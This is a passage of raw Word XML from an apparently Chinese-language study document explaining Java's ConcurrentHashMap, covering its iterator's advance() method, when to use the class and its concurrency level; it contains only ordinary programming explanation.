          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>nextSegmentIndex</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>对应段的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>table</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>。调用</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>next</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>方法时主要是调用了</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>advance</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>方法：</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ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>final</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void</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> advance() {  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00573A3A" w:rsidRPr="00F41A4C" w:rsidRDefault="00573A3A" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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if</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> (nextEntry != </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>null</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> &amp;&amp; (nextEntry = nextEntry.next) != </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>null</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return</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while</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> (nextTableIndex &gt;= </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="C00000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>0</w:t>
      </w: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if</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> ( (nextEntry = currentTable[nextTableIndex--]) != </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>null</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return</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while</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> (nextSegmentIndex &gt;= </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="C00000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>0</w:t>
      </w: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Segment&lt;K,V&gt; seg = segments[nextSegmentIndex--];  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00573A3A" w:rsidRPr="00F41A4C" w:rsidRDefault="00573A3A" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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if</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> (seg.count != </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="C00000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>0</w:t>
      </w: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currentTable = seg.table;  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00573A3A" w:rsidRPr="00F41A4C" w:rsidRDefault="00573A3A" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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for</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int</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> j = currentTable.length - </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="C00000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>; j &gt;= </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="C00000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>; --j) {  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00573A3A" w:rsidRPr="00F41A4C" w:rsidRDefault="00573A3A" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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if</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> ( (nextEntry = currentTable[j]) != </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>null</w:t>
      </w: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nextTableIndex = j - </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="C00000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>1</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return</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不想再多介绍了，唯一需要注意的是跳到下一个段时，一定要先读取下一个段的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>count</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>变量。</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>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这种迭代方式的主要效果是不会抛出</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>ConcurrentModificationException</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>。一旦获取到下一个段的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>table</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>，也就意味着这个段的头结点在迭代过程中就确定了，在迭代过程中就不能反映对这个段节点并发的删除和添加，对于节点的更新是能够反映的，因为节点的值是一个</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>volatile</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>变量。</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br/>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>结束语</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803295" w:rsidRPr="00F41A4C" w:rsidRDefault="00573A3A" w:rsidP="00573A3A">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>ConcurrentHashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>是一个支持高并发的高性能的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>HashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>实现，它支持完全并发的读以及一定</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>程度并发的写。</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>ConcurrentHashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>的实现也是很精巧，充分利用了最新的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>JMM</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>规范，值得学习，却不值得模仿。最后由于本人水平有限，对大师的作品难免有误解，如果存在，还望大牛们不吝指出。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00737C5B" w:rsidRPr="00A7236F" w:rsidRDefault="00003C0C" w:rsidP="00737C5B">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1.1.4</w:t>
      </w:r>
      <w:r w:rsidR="00737C5B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">.2 </w:t>
      </w:r>
      <w:r w:rsidR="00C0637F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>什么时候使用</w:t>
      </w:r>
      <w:r w:rsidR="00C0637F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ConcurrentHashMap</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00803295" w:rsidRPr="009F09B5" w:rsidRDefault="003268C1" w:rsidP="00AD32EA">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F09B5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>它允许完整的并发检索和更新。当有大量的并发更新时，</w:t>
      </w:r>
      <w:r w:rsidRPr="009F09B5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>ConcurrentHashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="009F09B5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>此时可以被使用。这非常类似于</w:t>
      </w:r>
      <w:r w:rsidRPr="009F09B5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>Hashtable</w:t>
      </w:r>
      <w:r w:rsidRPr="009F09B5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>，但</w:t>
      </w:r>
      <w:r w:rsidRPr="009F09B5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>ConcurrentHashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="009F09B5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>不锁定整个表来提供并发，所以从这点上</w:t>
      </w:r>
      <w:r w:rsidRPr="009F09B5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>ConcurrentHashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="009F09B5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>的性能似乎更好一些。所以当有大量更新时</w:t>
      </w:r>
      <w:r w:rsidRPr="009F09B5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>ConcurrentHashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="009F09B5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>应该被使用。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0098262E" w:rsidRPr="0098262E" w:rsidRDefault="00003C0C" w:rsidP="0098262E">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1.1.4</w:t>
      </w:r>
      <w:r w:rsidR="00892E91">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.3</w:t>
      </w:r>
      <w:r w:rsidR="004B41F4" w:rsidRPr="00892E91">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00892E91" w:rsidRPr="00892E91">
        <w:t>ConcurrentHashMap</w:t>
      </w:r>
      <w:r w:rsidR="00892E91" w:rsidRPr="00892E91">
        <w:t>的并发度是什么？</w:t>
      </w:r>
      <w:r w:rsidR="00892E91" w:rsidRPr="00892E91">
        <w:rPr>
          <w:color w:val="444444"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r w:rsidR="00892E91" w:rsidRPr="009F09B5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00892E91" w:rsidRPr="0098262E" w:rsidRDefault="00892E91" w:rsidP="009F09B5">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F09B5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>ConcurrentHashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="009F09B5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>把实际划分</w:t>
      </w:r>
      <w:r w:rsidR="009F09B5" w:rsidRPr="009F09B5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>map</w:t>
      </w:r>
      <w:r w:rsidRPr="009F09B5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>成若干部分来实现它的可扩展性和线程安全。这种划分是使用并发度获得的，它是</w:t>
      </w:r>
      <w:r w:rsidRPr="009F09B5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
